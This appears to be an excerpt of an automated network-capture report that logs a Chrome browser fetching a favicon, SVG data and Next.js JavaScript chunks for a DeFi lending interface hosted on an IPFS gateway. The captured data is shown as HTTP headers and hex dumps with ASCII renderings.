                                                                                                                                                                                                                                                  Data Ascii: 73-.226a7.384 7.384 0 0 0 .478 3.512 6.391 6.391 0 0 0 2.696 3.438c.725.384 1.49.69 2.279.912.205.073.581.203.659-.183.012-.11-.235-.32-.405-.421-.328-.19-.71-.304-1.022-.53a3.746 3.746 0 0 1-1.75-2.67 1.61 1.61 0 0 1 .643-1.593c.262-.2.575-.346.82-.552a1
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 39 20 36 2e 31 39 20 30 20 30 20 31 20 31 2e 34 35 36 2e 32 36 32 63 31 2e 39 30 35 2e 35 36 20 33 2e 38 39 32 2e 37 38 39 20 35 2e 38 37 35 2e 36 37 35 2e 38 38 32 2d 2e 31 20 31 2e 37 37 33 2e 30 38 20 32 2e 35 34 36 2e 35 31 34 61 32 2e 35 37 32 20 32 2e 35 37 32 20 30 20 30 20 31 20 31 2e 33 34 36 20 32 2e 36 32 35 20 34 2e 31 36 33 20 34 2e 31 36 33 20 30 20 30 20 31 2d 31 2e 36 35 35 20 32 2e 39 33 34 20 37 2e 39 36 32 20 37 2e 39 36 32 20 30 20 30 20 31 2d 35 2e 32 33 37 20 31 2e 36 35 38 20 35 2e 36 36 37 20 35 2e 36 36 37 20 30 20 30 20 30 2d 2e 37 31 34 2d 2e 30 35 33 5a 6d 2d 34 2e 31 37 33 2d 32 2e 38 34 32 63 31 2e 33 36 37 20 31 2e 30 37 35 20 32 2e 37 37 20 31 2e 38 33 37 20 34 2e 33 39 37 20 31 2e 38 39 32 20 31 2e 34 30 33 2e 30 34 36 20
                                                                                                                                                                                                                                                  Data Ascii: 9 6.19 0 0 1 1.456.262c1.905.56 3.892.789 5.875.675.882-.1 1.773.08 2.546.514a2.572 2.572 0 0 1 1.346 2.625 4.163 4.163 0 0 1-1.655 2.934 7.962 7.962 0 0 1-5.237 1.658 5.667 5.667 0 0 0-.714-.053Zm-4.173-2.842c1.367 1.075 2.77 1.837 4.397 1.892 1.403.046
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC1369INData Raw: 35 32 36 2d 2e 31 32 2d 2e 37 30 35 61 35 2e 39 33 20 35 2e 39 33 20 30 20 30 20 31 20 2e 35 37 2d 31 2e 33 38 20 35 32 2e 36 37 39 20 35 32 2e 36 37 39 20 30 20 30 20 31 20 34 2e 36 31 2d 36 2e 33 37 33 20 32 32 2e 33 33 37 20 32 32 2e 33 33 37 20 30 20 30 20 31 20 38 2e 38 34 2d 36 2e 31 38 39 20 35 38 2e 37 36 36 20 35 38 2e 37 36 36 20 30 20 30 20 31 20 31 30 2e 32 38 34 2d 32 2e 39 31 34 20 31 30 35 2e 37 33 36 20 31 30 35 2e 37 33 36 20 30 20 30 20 31 20 31 34 2e 39 32 31 2d 31 2e 39 20 37 32 2e 39 31 36 20 37 32 2e 39 31 36 20 30 20 30 20 31 20 31 34 2e 33 38 2e 34 35 37 63 31 2e 30 34 38 2e 31 35 20 32 2e 31 30 38 2e 32 34 32 20 33 2e 31 36 2e 33 36 33 61 37 34 2e 38 31 32 20 37 34 2e 38 31 32 20 30 20 30 20 31 20 31 33 2e 33 37 35 20 33 2e 30 33
                                                                                                                                                                                                                                                  Data Ascii: 526-.12-.705a5.93 5.93 0 0 1 .57-1.38 52.679 52.679 0 0 1 4.61-6.373 22.337 22.337 0 0 1 8.84-6.189 58.766 58.766 0 0 1 10.284-2.914 105.736 105.736 0 0 1 14.921-1.9 72.916 72.916 0 0 1 14.38.457c1.048.15 2.108.242 3.16.363a74.812 74.812 0 0 1 13.375 3.03


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  96192.168.2.549816209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:47 UTC768OUTGET /favicon32.ico HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1214INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:47 GMT
                                                                                                                                                                                                                                                  Content-Type: image/vnd.microsoft.icon
                                                                                                                                                                                                                                                  Content-Length: 1153
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreifksq3guk7hdr3gekqbd77dh7czvetv7lgix3j3p4sx3h77kmtp4i"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/favicon32.ico
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafkreifksq3guk7hdr3gekqbd77dh7czvetv7lgix3j3p4sx3h77kmtp4i
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-06
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 72081
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8ca0e438aed64400-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC155INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 02 00 00 00 fc 18 ed a3 00 00 04 48 49 44 41 54 78 01 34 cd 83 01 c3 40 00 00 c0 ac 58 db b6 6d db b6 dd e8 ff 07 6c a3 5b e0 b0 70 0d 44 2b 20 5e a2 52 45 2a 9d 27 73 39 32 9f 21 4a 69 a2 92 c0 6b 71 bc 11 fd b4 23 9f 4e e8 dd 0f be 07 be d7 d8 fb 9a ba 9f 73 d7 73 e9 b8 6f ec f7 ad f5 76 30 df 8e c6 eb c5 70 bd e9 2e 0f ed e5 a5 3e 7d 95 27 5c 7e a4 64 47 5a 72 40 e2 03 16 6c c0 ff 11
                                                                                                                                                                                                                                                  Data Ascii: PNGIHDR HIDATx4@Xml[pD+ ^RE*'s92!Jikq#Nssov0p.>}'\~dGZr@l
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC998INData Raw: ab 82 78 99 4e 15 69 ee 28 70 47 12 af 33 c7 b7 1d f9 72 c7 d0 ff 1a fb 98 63 c1 1c 8f 8d fd c1 1c 96 db 49 38 9e cc 71 fe aa ce b8 82 39 80 e4 80 f9 9a 90 3b 7e 95 95 03 97 2b 4f 10 c5 fb 23 fd 6d db b6 6d db b6 b9 b6 bd 13 7b 6d db de d8 76 26 af df f6 a4 32 51 67 5e 9f 1c 8c fa f6 2f 75 6f 15 9d a3 e6 57 95 db e1 4f 9e ac 95 d1 dd 92 d7 da 05 72 a0 d7 7e 91 be 81 35 a8 1c bf 7e ca f8 bd a1 24 6f 4d 29 57 05 72 a0 97 7f 95 62 0d 3a 87 b4 7b 2e 99 b9 22 a1 e8 ff 6f 75 0a a9 07 7a e9 0f f9 cb bf 49 e9 1c 56 b3 87 ec eb f3 a4 39 34 ad 53 42 ea 81 9e ff 53 f6 d2 ef 32 0a 47 59 d9 00 6c 2a eb 9c b5 9a 38 31 bb c9 23 c4 57 e8 b9 bf 15 cf ff 29 a7 70 cc cc 1d 90 1d a3 91 f8 4f 9f 33 ca de 79 d0 6b f9 43 5b d4 57 e8 e9 7f 14 cf 62 8d 02 1c 9f ff 28 8d c5 13 64
                                                                                                                                                                                                                                                  Data Ascii: xNi(pG3rcI8q9;~+O#mm{mv&2Qg^/uoWOr~5~$oM)Wrb:{."ouzIV94SBS2GYl*81#W)pO3ykC[Wb(d


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  97192.168.2.549818209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC504OUTGET /_next/static/chunks/7604-eabb8e5b8018f878.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:48 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 15005
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreigoqovhhvcjgzfy3lnvkophkdcfc4luhfxk6l4mrnjrmm7nk7ah3m"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/7604-eabb8e5b8018f878.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreigoqovhhvcjgzfy3lnvkophkdcfc4luhfxk6l4mrnjrmm7nk7ah3m
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028482
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 33 62 36 66 33 36 31 39 37 63 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e43b6f36197c-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1304INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 37 36 30 34 5d 2c 7b 37 36 39 32 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 76 61 72 20 6e 2c 69 2c 6f 3d 74 28 36 37 32 39 34 29 3b 66 75 6e 63 74 69 6f 6e 20 73 28 29 7b 72 65 74 75 72 6e 20 73 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 3f 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 2e 62 69 6e 64 28 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 31 3b 72 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 76 61 72 20 74 3d 61 72 67 75 6d 65 6e 74 73 5b 72 5d 3b 66 6f 72 28 76 61 72 20 6e 20 69 6e 20
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7604],{76920:function(e,r,t){var n,i,o=t(67294);function s(){return s=Object.assign?Object.assign.bind():function(e){for(var r=1;r<arguments.length;r++){var t=arguments[r];for(var n in
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1369INData Raw: 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6e 3d 6e 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 72 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 74 2e 70 75 73 68 2e 61 70 70 6c 79 28 74 2c 6e 29 7d 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 6a 28 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 31 3b 72 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 76 61 72 20 74 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 72 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 72 5d 3a 7b 7d 3b 72 25 32 3f 70 28 4f 62 6a 65 63 74 28 74 29 2c 21 30 29 2e 66 6f
                                                                                                                                                                                                                                                  Data Ascii: ct.getOwnPropertySymbols(e);r&&(n=n.filter((function(r){return Object.getOwnPropertyDescriptor(e,r).enumerable}))),t.push.apply(t,n)}return t}function j(e){for(var r=1;r<arguments.length;r++){var t=null!=arguments[r]?arguments[r]:{};r%2?p(Object(t),!0).fo
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1369INData Raw: 31 29 2c 73 3d 74 28 34 38 39 34 39 29 2c 61 3d 74 28 38 30 32 32 37 29 2c 63 3d 74 28 32 39 36 33 30 29 2c 6c 3d 74 28 38 31 36 34 35 29 2c 64 3d 74 28 36 38 33 34 36 29 2c 75 3d 74 28 33 30 31 32 30 29 2c 78 3d 74 28 36 37 32 39 34 29 2c 6d 3d 74 28 34 31 30 32 34 29 2c 68 3d 74 28 39 32 33 39 31 29 2c 70 3d 74 28 36 39 33 33 31 29 2c 6a 3d 74 28 37 33 39 36 35 29 2c 76 3d 74 28 34 33 34 37 38 29 2c 66 3d 74 28 38 31 39 35 29 2c 67 3d 74 28 34 36 39 33 30 29 2c 62 3d 74 28 37 37 35 33 37 29 2c 45 3d 74 28 36 33 32 30 36 29 2c 79 3d 74 28 37 36 39 32 30 29 2c 49 3d 74 28 36 33 34 39 31 29 2c 4f 3d 74 28 36 37 39 31 36 29 2c 43 3d 74 28 39 33 36 30 38 29 2c 77 3d 74 28 35 37 38 32 34 29 2c 53 3d 74 28 37 38 39 34 34 29 2c 5a 3d 74 28 31 30 33 34 33 29 2c
                                                                                                                                                                                                                                                  Data Ascii: 1),s=t(48949),a=t(80227),c=t(29630),l=t(81645),d=t(68346),u=t(30120),x=t(67294),m=t(41024),h=t(92391),p=t(69331),j=t(73965),v=t(43478),f=t(8195),g=t(46930),b=t(77537),E=t(63206),y=t(76920),I=t(63491),O=t(67916),C=t(93608),w=t(57824),S=t(78944),Z=t(10343),
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1369INData Raw: 3a 72 7d 29 7d 2c 42 3d 74 28 34 37 35 34 36 29 2c 52 3d 74 28 35 35 33 34 33 29 2c 55 3d 74 28 33 31 35 33 38 29 2c 57 3d 74 28 34 36 35 34 31 29 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 2e 65 6d 6f 64 65 43 61 74 65 67 6f 72 69 65 73 2c 74 3d 65 2e 73 65 6c 65 63 74 65 64 45 6d 6f 64 65 2c 6e 3d 65 2e 73 65 74 53 65 6c 65 63 74 65 64 45 6d 6f 64 65 2c 69 3d 65 2e 75 73 65 72 45 6d 6f 64 65 3b 72 65 74 75 72 6e 28 30 2c 46 2e 6a 73 78 73 29 28 52 2e 5a 2c 7b 73 78 3a 7b 6d 62 3a 31 2c 77 69 64 74 68 3a 22 31 30 30 25 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 46 2e 6a 73 78 29 28 42 2e 5a 2c 7b 73 78 3a 7b 6d 62 3a 31 2c 63 6f 6c 6f 72 3a 22 74 65 78 74 2e 73 65 63 6f 6e 64 61 72 79 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30
                                                                                                                                                                                                                                                  Data Ascii: :r})},B=t(47546),R=t(55343),U=t(31538),W=t(46541),H=function(e){var r=e.emodeCategories,t=e.selectedEmode,n=e.setSelectedEmode,i=e.userEmode;return(0,F.jsxs)(R.Z,{sx:{mb:1,width:"100%"},children:[(0,F.jsx)(B.Z,{sx:{mb:1,color:"text.secondary"},children:(0
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1369INData Raw: 30 5d 3d 22 45 4d 4f 44 45 5f 44 49 53 41 42 4c 45 44 5f 4c 49 51 55 49 44 41 54 49 4f 4e 22 2c 65 5b 65 2e 43 4c 4f 53 45 5f 50 4f 53 49 54 49 4f 4e 53 5f 42 45 46 4f 52 45 5f 53 57 49 54 43 48 49 4e 47 3d 31 5d 3d 22 43 4c 4f 53 45 5f 50 4f 53 49 54 49 4f 4e 53 5f 42 45 46 4f 52 45 5f 53 57 49 54 43 48 49 4e 47 22 7d 28 6e 7c 7c 28 6e 3d 7b 7d 29 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 45 4e 41 42 4c 45 3d 22 45 6e 61 62 6c 65 22 2c 65 2e 44 49 53 41 42 4c 45 3d 22 44 69 73 61 62 6c 65 22 2c 65 2e 53 57 49 54 43 48 3d 22 53 77 69 74 63 68 22 7d 28 69 7c 7c 28 69 3d 7b 7d 29 29 3b 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 2e 6d 6f 64 65 2c 74 3d 65 2e 75 73 65 72 2c 4e 3d 28 30 2c 6a 2e 48 54 29 28 29 2c 6b 3d 4e
                                                                                                                                                                                                                                                  Data Ascii: 0]="EMODE_DISABLED_LIQUIDATION",e[e.CLOSE_POSITIONS_BEFORE_SWITCHING=1]="CLOSE_POSITIONS_BEFORE_SWITCHING"}(n||(n={})),function(e){e.ENABLE="Enable",e.DISABLE="Disable",e.SWITCH="Switch"}(i||(i={}));var V=function(e){var r=e.mode,t=e.user,N=(0,j.HT)(),k=N
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1369INData Raw: 4f 4e 53 5f 42 45 46 4f 52 45 5f 53 57 49 54 43 48 49 4e 47 3a 72 65 74 75 72 6e 28 30 2c 46 2e 6a 73 78 29 28 70 2e 76 2c 7b 73 65 76 65 72 69 74 79 3a 22 69 6e 66 6f 22 2c 73 78 3a 7b 6d 74 3a 36 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 46 2e 6a 73 78 29 28 63 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 63 61 70 74 69 6f 6e 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 46 2e 6a 73 78 29 28 6f 2e 63 43 2c 7b 69 64 3a 22 54 6f 20 65 6e 61 62 6c 65 20 45 2d 6d 6f 64 65 20 66 6f 72 20 74 68 65 20 7b 30 7d 20 63 61 74 65 67 6f 72 79 2c 20 61 6c 6c 20 62 6f 72 72 6f 77 20 70 6f 73 69 74 69 6f 6e 73 20 6f 75 74 73 69 64 65 20 6f 66 20 74 68 69 73 20 63 61 74 65 67 6f 72 79 20 6d 75 73 74 20 62 65 20 63 6c 6f
                                                                                                                                                                                                                                                  Data Ascii: ONS_BEFORE_SWITCHING:return(0,F.jsx)(p.v,{severity:"info",sx:{mt:6,alignItems:"center"},children:(0,F.jsx)(c.Z,{variant:"caption",children:(0,F.jsx)(o.cC,{id:"To enable E-mode for the {0} category, all borrow positions outside of this category must be clo
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1369INData Raw: 20 45 2d 4d 6f 64 65 22 29 7d 29 2c 74 65 26 26 21 55 26 26 28 30 2c 46 2e 6a 73 78 29 28 5a 2e 49 2c 7b 6e 65 74 77 6f 72 6b 4e 61 6d 65 3a 4b 2e 6e 61 6d 65 2c 63 68 61 69 6e 49 64 3a 4d 7d 29 2c 30 3d 3d 3d 74 2e 75 73 65 72 45 6d 6f 64 65 43 61 74 65 67 6f 72 79 49 64 26 26 28 30 2c 46 2e 6a 73 78 29 28 70 2e 76 2c 7b 73 65 76 65 72 69 74 79 3a 22 77 61 72 6e 69 6e 67 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 46 2e 6a 73 78 29 28 63 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 63 61 70 74 69 6f 6e 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 46 2e 6a 73 78 29 28 6f 2e 63 43 2c 7b 69 64 3a 22 45 6e 61 62 6c 69 6e 67 20 45 2d 4d 6f 64 65 20 6f 6e 6c 79 20 61 6c 6c 6f 77 73 20 79 6f 75 20 74 6f 20 62 6f 72 72 6f 77 20 61 73 73 65 74 73 20 62 65 6c 6f 6e 67 69 6e
                                                                                                                                                                                                                                                  Data Ascii: E-Mode")}),te&&!U&&(0,F.jsx)(Z.I,{networkName:K.name,chainId:M}),0===t.userEmodeCategoryId&&(0,F.jsx)(p.v,{severity:"warning",children:(0,F.jsx)(c.Z,{variant:"caption",children:(0,F.jsx)(o.cC,{id:"Enabling E-Mode only allows you to borrow assets belongin
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1369INData Raw: 65 72 22 2c 6d 78 3a 31 7d 2c 63 68 69 6c 64 72 65 6e 3a 30 21 3d 3d 74 2e 75 73 65 72 45 6d 6f 64 65 43 61 74 65 67 6f 72 79 49 64 3f 28 30 2c 46 2e 6a 73 78 73 29 28 46 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 46 2e 6a 73 78 29 28 6c 2e 5a 2c 7b 73 78 3a 7b 66 6f 6e 74 53 69 7a 65 3a 22 31 32 70 78 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 46 2e 6a 73 78 29 28 79 2e 5a 2c 7b 7d 29 7d 29 2c 28 30 2c 46 2e 6a 73 78 29 28 63 2e 5a 2c 7b 76 61 72 69 61 6e 74 3a 22 73 75 62 68 65 61 64 65 72 31 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 50 2e 55 29 28 44 5b 74 2e 75 73 65 72 45 6d 6f 64 65 43 61 74 65 67 6f 72 79 49 64 5d 2e 6c 61 62 65 6c 29 7d 29 5d 7d 29 3a 28 30 2c 46 2e 6a 73 78 29 28 63 2e 5a 2c 7b 76 61 72 69 61 6e 74
                                                                                                                                                                                                                                                  Data Ascii: er",mx:1},children:0!==t.userEmodeCategoryId?(0,F.jsxs)(F.Fragment,{children:[(0,F.jsx)(l.Z,{sx:{fontSize:"12px"},children:(0,F.jsx)(y.Z,{})}),(0,F.jsx)(c.Z,{variant:"subheader1",children:(0,P.U)(D[t.userEmodeCategoryId].label)})]}):(0,F.jsx)(c.Z,{variant
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC1369INData Raw: 3d 58 3f 76 6f 69 64 20 30 3a 58 2e 69 64 29 3f 28 30 2c 46 2e 6a 73 78 29 28 63 2e 5a 2c 7b 73 78 3a 7b 74 65 78 74 41 6c 69 67 6e 3a 22 65 6e 64 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 58 2e 61 73 73 65 74 73 2e 6a 6f 69 6e 28 22 2c 20 22 29 7d 29 3a 28 30 2c 46 2e 6a 73 78 29 28 63 2e 5a 2c 7b 63 68 69 6c 64 72 65 6e 3a 28 30 2c 46 2e 6a 73 78 29 28 6f 2e 63 43 2c 7b 69 64 3a 22 41 6c 6c 20 41 73 73 65 74 73 22 7d 29 7d 29 7d 29 5d 7d 29 5d 7d 29 7d 29 2c 28 30 2c 46 2e 6a 73 78 29 28 77 2e 6a 7a 2c 7b 76 69 73 69 62 6c 65 48 66 43 68 61 6e 67 65 3a 21 21 58 2c 68 65 61 6c 74 68 46 61 63 74 6f 72 3a 74 2e 68 65 61 6c 74 68 46 61 63 74 6f 72 2c 66 75 74 75 72 65 48 65 61 6c 74 68 46 61 63 74 6f 72 3a 4a 2e 68 65 61 6c 74 68 46 61 63 74 6f 72 7d 29 2c 6f 65
                                                                                                                                                                                                                                                  Data Ascii: =X?void 0:X.id)?(0,F.jsx)(c.Z,{sx:{textAlign:"end"},children:X.assets.join(", ")}):(0,F.jsx)(c.Z,{children:(0,F.jsx)(o.cC,{id:"All Assets"})})})]})]})}),(0,F.jsx)(w.jz,{visibleHfChange:!!X,healthFactor:t.healthFactor,futureHealthFactor:J.healthFactor}),oe


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  98192.168.2.549817209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:48 UTC510OUTGET /_next/static/chunks/pages/_app-c0d18763a38243f4.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
